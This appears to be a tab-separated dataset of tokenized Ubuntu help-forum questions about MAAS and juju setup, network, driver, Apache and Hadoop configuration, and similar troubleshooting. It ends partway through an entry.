477822	can not bootstrap due to `` maas '' environment not found	i would like to test maas + juju + openstack ( i followed the documentation on maas.ubuntu.org ) i already made a test environment : 1 maas server wich will also run juju 10 kvm servers for openstack the kvm servers are already in `` ready '' state in maas . i would like to set up juju but i could not which is drives me crazy . my environments.yaml : environments : maassrv : type : maas maas-server : 'http : // $ { 192.168.1.116 } /maas/' maas-oauth : 'my-key-from-maas' authorized-keys-path : /root/.ssh/id_rsa.pub admin-secret : 1234 default-series : trusty when i run juju status -e maassrv : error unable to connect to environment `` maassrv '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : environment `` maassrv '' not found ok , it 's right , so i should run juju bootstrap -e maassrv : error environment `` maassrv '' not found when i run the command without the -e switch : error : no environment specified so , i am stuck here , i already added the required ssh keys to maas too . i ran out of ideas why it is n't working . i did not use ' $ { } ' form in my config file ( the forum did not allow me to post that line without it : ) ) . so it exactly looks like you adviced to modify . when i run juju bootstrap -e maas -- debug 2014-06-10 08:34:11 info juju.cmd supercommand.go:302 running juju-1.18.4-trusty-amd64 [ gc ] 2014-06-10 08:34:11 error juju.cmd supercommand.go:305 environment `` maas '' not found juju status -e maas -- debug gives me this , this is ok , there is no maas environment ... but i ca n't create is ... it 's a trap : ) 2014-06-10 08:39:09 info juju.cmd supercommand.go:302 running juju-1.18.4-trusty-amd64 [ gc ] 2014-06-10 08:39:09 debug juju api.go:179 no cached api connection settings found 2014-06-10 08:39:09 error juju.cmd supercommand.go:305 unable to connect to environment `` maas '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : environment `` maas '' not found follow up : i managed to run juju bootstrap ( had to create a maas user ) . which command failed again , so i had to run juju sync-tools -- show-log then rerun juju bootstrap which is failed again the sympton : when i ran juju bootstrap it will pick up a random machine eg : maas-10 , starts the machine and install the operating system , then swit it off and gave me this as result : debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/maas/.juju/ssh/juju_id_rsa -i /home/maas/.ssh/id_rsa ubuntu @ 192.168.200.114 /bin/bash error juju.provider.common bootstrap.go:123 bootstrap failed : waited for 10m0s without being able to connect : permission denied ( publickey , password ) . stopping instance ... info juju.cmd cmd.go:113 bootstrap failed , destroying environment info juju.provider.common destroy.go:14 destroying environment `` maas '' error juju.cmd supercommand.go:305 waited for 10m0s without being able to connect : permission denied ( publickey , password ) .` it is weird , i added maas user 's public key to maas api so that should be ok. during the install process the installed server should import the key ? !
477827	update-rc.d command warning	i am trying to add ssh deamon at startup but i am getting following problem $ sudo update-rc.d ssh start 50 2 3 4 5 . stop 90 0 1 6 . update-rc.d : warning : stop runlevel arguments ( 0 1 6 ) do not match ssh default-stop values ( none ) adding system startup for /etc/init.d/ssh ... /etc/rc0.d/k90ssh - > ../init.d/ssh /etc/rc1.d/k90ssh - > ../init.d/ssh /etc/rc6.d/k90ssh - > ../init.d/ssh /etc/rc2.d/s50ssh - > ../init.d/ssh /etc/rc3.d/s50ssh - > ../init.d/ssh /etc/rc4.d/s50ssh - > ../init.d/ssh /etc/rc5.d/s50ssh - > ../init.d/ssh
477832	how to join an ubuntu 14.04 workstation to a windows domain	i have just install ubuntu 14.04 on a windows hyper v vm . i need to connect this installation to our windows domain . i have read articles on the net about how to do this but they all point to using likewise which is no longer available . a step by step guide would be much appreciated . thanks corey
477833	ca n't connect to wired network	i have installed ubuntu v 12.04 in a dual boot config . with windows xp on my dell 8200 . windows uses the wired connection to the home network and internet through the dynex card and cisco router with no problems . ubuntu , however , once downloaded and booted up is unable to use the wired connection . i have tried adding auto eth0 and iface eth0 inet dhcp to /etc/network/interfaces but on restarting , the system tries to make the connection for 2 minutes and fails . i have edited inet4 in the wired settings to include the two google dns servers but this does not help . in brief , i have followed several of the recommendations here and have had no success in locating the network .
477835	permission denied for codebloks	i have install code blocks from ubuntu software center.when i create a new project a compile it in output window it say `` permission denied '' .how i must run code blocks or where place project files to remove this error ? !
477839	when i suspend the laptop , the fan restarts and the cd drive does too ?	everytime i suspend my laptop , the fan restarts and the cd drive begins to start . can anyone help me fix this ? i 'm kinda new with linux , so i do n't exactly know everything . also , the battery drains very fast during a suspend . i 'm assuming it 's because of the fan not shutting off .
477840	where do i set the lockscreen image path in trusty ?	i do n't want my desktop session wallpaper to be used as lockscreen background . thank you
477841	default state of apport messages in 14.04	well this is simple question seeking for simple answer : are those annoying apport error messages turned off by default in ubuntu 14.04 ? i know it is stupid to ask this question here , but google has nothing to say about it , and i don`t know who to ask . and i really want to know it . thanks
477842	grep , no value return	i am searching for a word , in this case `` hehe '' that is located in the file findtest by using grep , but when i initiate the search : grep -r `` hehe '' or grep -lr `` hehe '' it starts but after 5 min waiting nothing happens , even if i am in the same directory as the file . the only way i get a results straight away is being in the same directory and typing : grep `` hehe '' findtest are their any other ways to search for a word ? even if not in the same directory .
477851	ubuntu 14.04 install on hardware with raid	i 've just built a new machine using an asus mobo with 8gb of ram and set up raid 10 with 4 new hdd . i want to install ubuntu 14.04 on it and so far have tried to do so 3 times with no luck . the installation seems to work fine but after it has finished it restarts and all i get is a black screen . is there something i am missing ? i 've completed the install on other machines before without issue i just never tried it on a machine with raid set up .
477854	chrome display glitch when the gpu acceleration is on , amd catalyst driver	i have some graphics glitch when enable gpu acceleration in chrome . if i disable acceleration , it fix the glitch ; but in full hd most of flash videos frame rate drop , so very slow . : ) any idea , what can i do ? i upload 2 pics from glitch . my hardware : cm hyper tx 3 on amd a5300 with hd 7480d 6 gb ram . i use official amd driver from amd.com , ubuntu 14.04 ( i upgraded from 12.04 , in ubuntu 12 , same glitch with old drivers . ) i reinstalled x.org completely and purge all config files , but this did n't resolve the problem . if i use other drivers , i have some other problem ie . : nor automatic resolution change when connect new monitor , false refresh-rate for displays and etc .
477855	how do i get movies to work in my dual cd/dvd computer ?	i have an older dell optiplex gx620 . it has an ide cd drive and an ide dvd drive . i can not seem to get ubuntu 14.04 to allow movies to play . i 've tried installing libdvdcss2 as well as the libdvdread4 . vlc was installed last , but each time i attempt to play a movie , the player flashed briefly , then goes back to the initial screen like i did n't even have a dvd in the drive . i 'm fairly new to the linux world , so any/all suggestions would be helpful .
477856	network between a ubuntu 12.04 lts virtualbox vm and the host os	it took me a while to get networking working between my os x laptop and a ubuntu 12.04 lts virtual machine on virtual box . i do n't see instructions on here , so i 'll post mine .
477866	how to reinstall xp from grub rescue	my friend installed ubuntu along side windows xp so i could dual boot , after a while i decided to delete the ubuntu partition unaware that you need the xp recovery disk or something like that to fix windows . so every time i start my computer the grub rescue prompt appearers so is there a way for booting window from grub rescue without the window xp recovery disk ?
477867	ubuntu maas dhcp not working cluster	i am a newbie with ubuntu maas - i have region & cluster controller running on one machine . i have two nics - eth1 - which is connected to our organization and eth0 - which i am trying to setup dhcp server and cluster to manage the nodes . for eth0 , i have it as `` manage dhcp and dns '' , and copied the exact fields from https : //maas.ubuntu.com/docs/cluster-configuration.html but , there is no dhcp server running - i can see error log maas/celery.log '' ignoring dhcp scan for eth0 , it has no ip address '' i used this a reference : what 's the correct maas dhcp configuration ? can you please suggest an example configuration using the reference or your experience ? any suggestions are appreciated . thanks
477870	mounting a read only drive as read write	i have a special bespoke device with a usb interface . when plugging in the device to my laptop - ubuntu 12.04 it mounts as a read only usb drive - with a file on it . this file is created by the device and writes to the file when the device scans stuff . i however , want to be able to write to the drive so the device 'thinks ' it has already scanned x amount of entries . basically i want to replace the file 'file1.txt ' my version of 'file1.txt ' however i can not because the drive is mounting as read only . i have tried the following commands : andy @ andy-thinkpad-w530 : /media/iread $ touch giveme.txt touch : can not touch `giveme.txt ' : read-only file system andy @ andy-thinkpad-w530 : /media/iread $ sudo mount -o remount , rw '/media/iread' [ sudo ] password for andy : mount : can not remount block device /dev/sdb read-write , is write-protected andy @ andy-thinkpad-w530 : /media/iread $ can anybody suggest anything i can try to mount this as writable drive ? i have a very strong feeling that the chip which is storing this data is the following : arm stm32f103 rbt6 22oup _ 93 mlt22950 hope this helps somebody to help me !
477872	configs reset automatically after every boot in xubuntu	i installed xubuntu in a friend 's computer and he keeps telling me that no matter how many times he changes basic settings such as the screensaver ( time until screen goes black ) , it goes back to default settings after every boot . he also has an antivirus that is deactivated by default after every boot , even if he chose the option `` autorun after boot '' in the config page . do you know what 's going on ? thank you very much .
477873	how do i work around a `` stack size specified is too small '' error in java on power8 ?	i am trying to run java applications ( elasticsearch and cassandra ) on ubuntu ( 14.04 ) running on power pc hardware using the openjdk . i ran into an error : the stack size specified is too small , specify at least 1664k error : could not create the java virtual machine . error : a fatal exception has occurred . program will exit . i have found that the x86_64 openjdk java requires at least 160k for stack size . so it appears the power pc architecture requires a stack size ten times larger than x86_64 . are there any other java settings that are specific to linux java running on power pc architecture ?
477876	weakest link using ubuntu : nvidia graphics extremely fragile	i did not upgrade to 14.04 so still at 13.10 today the normal apt-get update rendered my nvidia laptop in a broken graphics state . upon successful login it took me to normal desktop screen however neither top widget bar nor app launcher bar appeared . below set of commands normally fixes such nvidia graphics issues . ////////////////|||||||||||||||||||||\\\\\\\\\\\\ remove everything to do with the nvidia proprietary drivers . sudo nvidia-settings -- uninstall sudo apt-get remove -- purge nvidia* start from scratch . sudo apt-get remove -- purge xserver-xorg-video-nouveau sudo apt-get remove -- purge xserver-xorg-video-nv re-nstall nvidia sudo apt-get install nvidia-common sudo apt-get install xserver-xorg-video-nouveau sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core reconfigure the x server . sudo dpkg-reconfigure xserver-xorg ////////////////|||||||||||||||||||||\\\\\\\\\\\\ above commands today just gives me a black screen . suggestions ? ? ? p.s . since i 'm developing webgl i need nvidia and not nouveau drivers
477877	how to do one click vpn , mount , and ssh	i do accessing to my uni shared files a lot and i need ssh to run commands at the uni server , and before i am able to mount i need to first access the uni vpn . i was trying to write a shell batch to start all these with one click but i am really lost in the details . also the the openvpn command i use hangs in the terminal window and i have to open a different one to be able to continue my work . any easy way to create such a one click icon on desktop that starts vpn , mount a folder , and then enters ssh ? and of course overcoming the openvpn hanging ? thanks
477880	problem with flash plugin on chromium ; defaults to outdated linux flash 11.2	adobe dropped flash for linux with the last version being 11.2 albeit bug fixes still being released . i have n't had much of a problem using flash in firefox until recently with a few sites requiring newer version . so , i decided to grab chromium seeing how it is supposed to be built in with the latest version of flash . for some reason the plugin is using 11.2 . i went ahead and grabbed chrome itself and it indeed does use the latest version , 13 . i would just prefer to use chromium over chrome for personal reason . i took a screenshot with the plugins list , side-by-side showing chromium and chrome to show you what i mean . i tried googling but could n't really find anything relevant . the latest version from the repository on my setup for chromium is 34.0.1847.116 where as chrome is 35.0.1916.114 . i 'm not sure if that could be the problem or what .
477884	windows xp with ubuntu 14.04 on 2 separate hard drives	i am new to ubuntu . i have windows xp professional 32-bit on one 300gb ide hard drive and ubuntu 14.04 running on another 61gb ide hard drive , and i can not get my windows xp to boot with grub ! when i select windows xp from the boot menu , grub just restarts my computer . the computer i have with those two hard drives is a dell optiplex gx240 , so the hardware is old , and its bios wo n't let me change the boot priority on the two ide hard drives . what can i do now ? is there a step i missed when installing ubuntu ? can i edit grub to boot windows xp without messing with the bios ? do i have to downgrade to an older release of ubuntu to make it work ? i am willing to reinstall ubuntu , if that 's what it takes .
477886	keyboard shortcut for arrow keys	on my keyboard , the arrow keys are off to the right and is somewhat slower and more tiresome to use . is there a keyboard shortcut for the arrow keys using keys that are more toward the center of the keyboard ? is there a way to create such a keyboard shortcut ? ( perhaps something like alt + h , j , k , l. ) thanks for any help .
477889	unable to access i18n in qml app 's js file	i 'm having trouble importing the i18n library included in ubuntu.components 0.1 for use in a js file . i initially ran into my question/problem while hacking on the 'clock ' ubuntu touch core app , but i was able to reproduce the behavior using a much simplified code snippet , so i 've pasted that below . when i run this code on my 14.04 desktop using the ubuntusdk , i get the error message : currencyconverter/converterutils.js:5 : typeerror : property 'tr ' of object [ object object ] is not a function it appears that either i 'm referencing the function using the wrong syntax , or there 's something wrong with my import syntax . currencyconverter.qml import qtquick 2.0 import ubuntu.components 0.1 import `` converterutils.js '' as utils mainview { id : root applicationname : `` currencyconverter '' width : units.gu ( 100 ) height : units.gu ( 75 ) property real margins : units.gu ( 2 ) property real buttonwidth : units.gu ( 9 ) page { title : utils.gettitle ( ) } } converterutils.js .pragma library .import ubuntu.components 0.1 as foo function gettitle ( ) { return i18n.tr ( `` currency converter '' ) ; } notes 1 ) the `` .pragma library '' line ( to the best of my understanding ) is there to say : `` only load one version of this library and share it between all places this js is included in this app . http : //qt-project.org/doc/qt-4.8/qdeclarativejavascript.html 2 ) when i remove the `` .pragma library '' line , as the link above hints , the js file inherits the imports of the qml file it is used from . so when i remove that line i can access i18n . this makes sense . however since the 'clock ' app , where i originally encountered this problem , uses the .pragma directive ( ostensibly for performance reasons ) i do n't think removing it is a good solution . 3 ) i found the `` .import '' syntax for importing qml libraries into a js file here : http : //www.qt-project.org/doc/qt-5/qtqml-javascript-imports.html i might have misinterpretted it , but it looks right to me . 4 ) an interesting note is that when editing this code using the ubuntusdk ( qtcreator ) , typing `` foo . '' brings up `` i18n '' as an autocomplete suggestion . typing `` foo.i18n . '' will bring up `` tr ( ) '' as one of the autocomplete suggestions . so it seems like the ubuntusdk recognizes my `` foo '' qualifier/namespace . or maybe the autocomplete does n't take imported libraries into account . just thought it was interesting . so my question is : does anyone know what 's causing this behavior ? i can probably work around the problem by calling i18n.tr ( ) from a qml file rather than a js util library , but i 'm curious to know what i did wrong . any suggestions ?
477892	14.04 with pre-installed 12.04 in the same laptop ( live cd ) [ installation ]	i want to install the 14.04 lts version on my laptop where i use now 12.04 lts , i want to use a live cd and i do n't know if it will erase my 12.04 or integrate it on grub in the start on my laptop . 1 ) can i get the both on the same laptop using only the live cd ( choosing in the grub interface ) ? 2 ) how can this be done ? thank you .
477894	chromium-browser -- proxy-server debugging	many places online have pointed out to configure chromium proxy via command can be achieve with the following line chromium-browser -- proxy-server= [ username ] : [ password ] @ [ host ] : [ port ] but i got this result on every request . here 's the output in the command line right after executing the previous command . ( they do not appear to be relevant . there are no new command line output when i try to visit a page ) libgl error : failed to authenticate magic 30 libgl error : failed to load driver : vboxvideo attention : default value of option force_s3tc_enable overridden by environment . [ 29551:29551:0606/160459 : error : sandbox_linux.cc ( 268 ) ] initializesandbox ( ) called with multiple threads in process gpu-process i have double checked that the proxy credential works with the foxyproxy chrome plugin . what else can i try to figure this out ? [ edit ] going to chrome : //net-internals/ # proxy and reading `` effective proxy settings '' if i do chromium-browser with no flags , i get use direct connections . source : gsettings if chromium-browser -- proxy-server= [ host ] : [ port ] , i get a message box requesting to login , and under `` effective proxy settings '' : proxy server : [ host ] : [ port ] if chromium-browser -- proxy-server= [ user ] : [ pass ] @ [ host ] : [ port ] , `` effective proxy settings '' shows : use direct connections
477896	2 firefox running with 2 icons	is it possible when you are running 2 firefox with different sync to have 2 icons ? for example would one have the normal logo and then i could choose an icon for the other one ? or maybe have one firefox the latest version and the other another version ? i use `` firefox -profilemanager -no-remote '' in the command line to open a browser with new sync .
477899	applications closes automaticly	ubuntu 12.04 server ( ubuntu desktop installed ) after using a application for a minute , it will close automaticly , why this happens ?
477905	using ubuntu 14.04 , why is my satellite l305d-s5974 overheating	i wiped my hard drive completely and booted with ubuntu 14.04 . within about 15 min of turning it on it turns off and is burning up . i am new to linux . and quite honestly , have a lot to learn about computers in general . i tried installing tlp , but that did n't help at all .
477906	ca n't update my system due to gpg error clearsigned file is n't valid , got 'nodata '	i ca n't update ... i have been trying to troubleshoot this problem for a while now ... the only way i found is to re-install ubuntu ... sudo apt-get update -o debug : :acquire : :http=true 0 % [ connecting to mirror.bytemark.co.uk ( 212.110.161.69 ) ] [ connecting to archivget /ubuntu/dists/trusty/inrelease http/1.1 host : archive.canonical.com cache-control : max-age=0 accept : text/* range : bytes=213- if-range : mon , 02 jun 2014 21:50:58 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) 0 % [ connecting to mirror.bytemark.co.uk ( 212.110.161.69 ) ] [ waiting for headers ] get /ubuntu/dists/trusty/inrelease http/1.1 host : mirror.bytemark.co.uk cache-control : max-age=0 accept : text/* range : bytes=213- if-range : sat , 07 jun 2014 00:11:36 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /ubuntu/dists/trusty/inrelease http/1.1 host : extras.ubuntu.com cache-control : max-age=0 accept : text/* range : bytes=213- if-range : sat , 07 jun 2014 00:19:18 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /appgrid/stable/ubuntu/dists/trusty/inrelease http/1.1 host : ppa.launchpad.net cache-control : max-age=0 accept : text/* range : bytes=213- if-range : thu , 05 jun 2014 14:53:42 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /torproject.org/dists/trusty/inrelease http/1.1 host : deb.torproject.org cache-control : max-age=0 accept : text/* if-modified-since : fri , 30 may 2014 11:28:02 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) http/1.1 200 ok content-type : text/html ; charset=utf-8 content-length : 213 date : sat , 07 jun 2014 00:20:52 gmt server : apache/2.2.22 ( ubuntu ) vary : accept-encoding get:1 http : //extras.ubuntu.com trusty inrelease [ 213 b ] 94 % [ 1 inrelease gpgv 213 b ] [ waiting for headers ] [ waiting for headers ] [ waitisplitting up /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_inrign http : //extras.ubuntu.com trusty inrelease e : gpg error : http : //extras.ubuntu.com trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) superuser @ dude-x202e : ~ $ sudo apt-get update -o debug : :acquire : :http=true 0 % [ working ] get /ubuntu/dists/trusty/inrelease http/1.1 host : archive.canonical.com cache-control : max-age=0 accept : text/* range : bytes=213- if-range : mon , 02 jun 2014 21:50:58 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /ubuntu/dists/trusty/inrelease http/1.1 host : extras.ubuntu.com cache-control : max-age=0 accept : text/* range : bytes=213- if-range : sat , 07 jun 2014 00:21:27 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /ubuntu/dists/trusty/inrelease http/1.1 host : archive.ubuntu.com cache-control : max-age=0 accept : text/* range : bytes=213- if-range : sat , 07 jun 2014 00:08:34 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /appgrid/stable/ubuntu/dists/trusty/inrelease http/1.1 host : ppa.launchpad.net cache-control : max-age=0 accept : text/* range : bytes=213- if-range : thu , 05 jun 2014 14:53:42 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) get /torproject.org/dists/trusty/inrelease http/1.1 host : deb.torproject.org cache-control : max-age=0 accept : text/* if-modified-since : fri , 30 may 2014 11:28:02 gmt user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) http/1.1 200 ok content-type : text/html ; charset=utf-8 content-length : 213 date : sat , 07 jun 2014 00:21:32 gmt server : apache/2.2.22 ( ubuntu ) vary : accept-encoding get:1 http : //archive.ubuntu.com trusty inrelease [ 213 b ] 94 % [ 1 inrelease 213 b/213 b 100 % ] [ waiting for headers ] [ waiting for headers ] get /ubuntu/dists/trusty-updates/inrelease http/1.1 host : archive.ubuntu.com cache-control : max-age=0 accept : text/* user-agent : debian apt-http/1.3 ( 1.0.1ubuntu2 ) http/1.1 200 ok content-type : text/html ; charset=utf-8 content-length : 213 date : sat , 07 jun 2014 00:21:32 gmt server : apache/2.2.22 ( ubuntu ) vary : accept-encoding get:2 http : //extras.ubuntu.com trusty inrelease [ 213 b ] 97 % [ 1 inrelease gpgv 213 b ] [ connecting to archive.ubuntu.com ( 91.189.92.200 ) ] splitting up /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_inign http : //archive.ubuntu.com trusty inrelease e : gpg error : http : //archive.ubuntu.com trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? )
477908	need help connecting to internet/wifi on ubuntu 14.04 [ dell latitude 131l ]	i downloaded ubuntu 14.04 today , and i went about installing it on my personal laptop . during the installation it asks you if you would like to apply updates while the installation is being processed ; however , my laptop was already having issues connecting at the time , so i could not select that option . ( i do not know if that has any effect on the issue i am currently experiencing . ) ubuntu just finished installing , and it automatically has no connections . i plugged in an ethernet cord to the laptop , and i still could n't get any sort of connections . any help would be greatly appreciated . note : before installing ubuntu , i was running windows 7 . i was , also , connected to wifi earlier today , before installing ubuntu .
477909	how to improve the sounds on ubuntu 14.04 lts	when i used to run the windows on my laptop , i had installed a software called `` realtek '' sound , or something like this , and the sound produced was much improved . now , with ubuntu 14.04 lts in the same computer , the sound is not so good as it was with windows . is there something i can do for improving it ?
477910	netfilter 's function nfq_get_outdev_name ( )	i 'm trying to figure out what the interface of a packet is using netfilter linux library on ubuntu 12.04 . one of my interfaces is a lan ( eth0 ) , and the other one is connected to a router ( that i 've set up a nat for ; shown as eth1 by ifconfig ) with a usb-lan adapter . the problem is that inside my code , the nfq_get_outdev_name ( ) function return -1 for the eth1 , and shows null ( as opposed to eth1 ) for the name ! but it works for the eth0 . i 'm wondering if there is a way to identify if it is `` eth1 '' . note : function `` nfq_get_outdev '' which is the father function of nfq_get_outdev_name ( ) shows 6 , which seems reasonable .
477911	how to set automatic brightness in macbook pro ?	i have just installes ubuntu 14.04 in my macbook pro , and i already configure all but the keyboard and screen brightness . in os x , the brightness is controled automatically , i want to know if this is possible to do the same on ubuntu , if ca n't , then how can i set that do not start with all the brightness , this has been a great bug in ubuntu since the start , a lot of time has passed and this keeps been a real trouble . thanks for your help .
477915	usb hub not working on resume from suspend	all the usb ports on my laptop work but when i resume from suspend some the usb ports do n't work . lsusb before suspend : bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f3:014b elan microelectronics corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 04f2 : b3a6 chicony electronics co. , ltd bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lsusb after suspend : bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f3:014b elan microelectronics corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
477916	using an external hard drive as a server along with using wifi to connect to that server	i have an external seagate 1tb hard drive that i would like to use as a media server . it will be connected via usb . how would i go about using it as a nas to where it can be accessed from other devices on my own network , but also be connected to my desktop and not interfere with my desktop 's os environment ?
477918	booting briefly shows cli login and then black	when i boot to ubuntu on my dualboot system , it appears to boot normally , up to the point when i would normally expect to see the lightdm graphical login screen . however , i see a cli login screen , which i assume is tty1 . before i get a chance to actually login to it , though , it drops to a black screen with a flashing cursor . pressing ctrl+alt+f1 does nothing . when i hit the power button on the laptop , i see the usual scrolling text as ubuntu shuts down . i know that this is related to me having installed the proprietary ati drivers for the video card . purging the drivers gave me back a gui , but unfortunately no working desktop environment , and switching to the mesa drivers returned me to the black screen issue . the only way i can get a stable working cli is through booting to advanced options and choosing a root shell prompt , as even the failsafe x session does n't function for me . edit : managed to get hold of an xorg log that might be helpful http : //pastebin.com/f3crfb5f edit : ok.. managed to get into the gui/desktop , but now no sign of anything unity-related . just the desktop itself . no environment
477921	how to disable fn key	i just bought a new keyboard and when i use it the letter keys that have the numbers on them , u-4 , i-5 etc are the default . i know when i press the `` fn '' key , it allows me to type normally but i would like to have it set the other way . is there a way to do that ? i 'm running ubuntu 12.04
477923	apache - create multiple aliases	i 'm trying to setup two websites on my apache server . one is www.domain.com and the other is test.domain.com . currently , my 000-default.conf file reads as follows : < virtualhost www:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.domain.com # serveralias www serveradmin webmaster @ domain.com documentroot /var/www/domain.com/ # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /domain.error.log customlog $ { apache_log_dir } /domain.access.log combined usecanonicalname on allow from all options +indexes # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > < virtualhost test:80 > documentroot `` /var/www/domain.com/test/ '' servername test.domain.com serveradmin webmaster @ domain.com errorlog $ { apache_log_dir } /test.domain.error.log customlog $ { apache_log_dir } /test.domain.access.log combined usecanonicalname on allow from all options +indexes < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet as is , when i use a browser to go to the www location , it show me a directory listing . however , if i remove the www:80 on line 1 and replace it with *:80 , it correctly displays the webpage . i do n't understand why . can anyone help me configure this 000-default.conf file so that www goes to `` /var/www/domain.com '' and that test goes to `` /var/www/domain.com/test '' ? thank you .
477925	is it safe to alias rm to safe-rm ?	we are happy to use safe-rm as a replacement to rm , but is it considered safe to alias it ? e.g . alias rm='safe-rm'
477931	why did ubuntu 14.04 create a 15.8gb swap partition ?	i started with windows 7 on 120gb ssd and ubuntu 14.04 32bit installed on 60gb partition on separate 1tb hdd . i just did a fresh reinstall of 14.04 64bit on the 1tb hdd . in the installation set up process , i selected the second choice of `` deleting ubuntu 14.04 and all it 's files , documents , photos etc and reinstalling '' to what i figured would reinstall the 64bit os on the already existing 60gb allocated partition . instead , it reinstalled ubuntu as 43.5 gb and created a separate 15.8 partition . so now it reads that my disk space for ubuntu ( in settings > details ) is 43.5gb ( instead of the previous 60gb that my old 32bit had ) the upside is i can now access my 1tb hdd from my toolbar ( and all the files located on it ) before , i could only access that through windows ( i can also access the ssd too , but that was always the case ) both drives are mounted now . my initial reaction was to go into windows 7 > disk management > delete the strange/new 15gb partition > extend the 43.5 to the unallocated space . but i 'm not sure if this is necessary or would even work . my question is why did it create a 15gb partition shrinking my ubuntu disk space , and is it useful ? i do n't want wasted space , so before i go through all my set up of ubuntu , should i change this . at this time my hdd reads as 43.5 partiton , 15.8 partition , and 874gb exfat32 ( 939gb total ) so yes , per gparted it 's linux-swap . why do i have that now ? my previous set up showed disk space as complete 60 gb ( technically 59. ? )
477933	audio not playing through headphones	i am using dell alienware m14x . i have installed ubuntu 14.04 on my laptop . the problem that i am facing is that the audio plays only through speakers all the time even i though i plug in my headphone . when i go to sound settings , it is showing me headphones in the `` play sound through '' which means that my system is able to detect the headphones ; but just the audio does n't play through the headphones , instead it still plays through speaker .
477937	new user very confused on starting	on my windows 7 laptop , i want to start using ubuntu ( linux ) , but since i have never used linux before , i find it confusing for me on how to start . i see ubuntu , then i see xubuntu . what is the difference and which one would be advised to use for now ? at the beginning certainly , i do n't want to remove windows , i want to ween myself away from windows . to do this , is it best to create a boot dvd , cd or bootable flash drive with umbuntu . does it matter which i use ? after what is a recommended free documentation to use to guide me through learning to use and learn ubuntu ? i do n't know where to start .
477939	ubuntu/kubuntu 14.04 lts ca n't boot on a nvidia optimus laptop	i am unable to boot ubuntu/kubuntu 14.04 lts on thinkpad t420i with nvidia optimus enabled . system boots to a blank screen . system also slowly turns into a furnace . temperature would read close to 100c or maximum for the system . thanks .
477947	what do i need for remotely accessing my ubuntu 14.04 machine ?	i am at a loss as to how to set up my machine for remote connection . do i need to install a vnc server ( which one ? ) or is vino ( installed by default ) enough ? i opened desktop sharing preferences dialogue and enabled it ( checked first two , allow to connect and control ) . i tried to connect using realvnc chrome app , but it says the authentication mechanism requested can not be provided by the computer . vnc viewer also fails with an error about encryption level . by the way , eventually i am going to need to connect from a windows 7 machine , but for now i just want to get it to work .
477951	unity launcher appear on gnome session , how to fix it ?	yesterday my gnome 's completely broken , cause there are unity launcher on gnome session . i have no idea why this happend , see the picture : and i'am not able to access gnome panel reinstalling no give me result sudo apt-get install -- reinstall gnome-session-fallback note : before it , i was resetting gnome and this happends
477952	namenode formatting in hadoop installation	i have given the path for both the configuration files directory and the .sh files directory . i managed to do the configurations with this path : root @ ratan-inspiron-n5110 : /home/hduser/hadoop/hadoop-2.4.0/etc/hadoop # gedit coresite.xml < configuration > < ! -- in : conf/core-site.xml -- > < property > < name > hadoop.tmp.dir < /name > < value > /home/hduser/tmp < /value > < description > a base for other temporary directories. < /description > < /property > < property > < name > fs.default.name < /name > < value > hdfs : //localhost:54310 < /value > < description > the name of the default file system . a uri whose scheme and authority determine the filesystem implementation . the uri 's scheme determines the config property ( fs.scheme.impl ) naming the filesystem implementation class . the uri 's authority is used to determine the host , port , etc . for a filesystem. < /description > < /property > < /configuration > root @ ratan-inspiron-n5110 : /home/hduser/hadoop/hadoop-2.4.0/etc/hadoop # gedit mapred-site.xml < configuration > < ! -- in : conf/mapred-site.xml -- > < property > < name > mapred.job.tracker < /name > < value > localhost:54311 < /value > < description > the host and port that the mapreduce job tracker runs at . if `` local '' , then jobs are run in-process as a single map and reduce task . < /description > < /property > < /configuration > root @ ratan-inspiron-n5110 : /home/hduser/hadoop/hadoop-2.4.0/etc/hadoop # gedit hdfs-site.xml < configuration > < ! -- in : conf/hdfs-site.xml -- > < property > < name > dfs.replication < /name > < value > 1 < /value > < description > default block replication . the actual number of replications can be specified when the file is created . the default is used if replication is not specified in create time . < /description > < /property > < 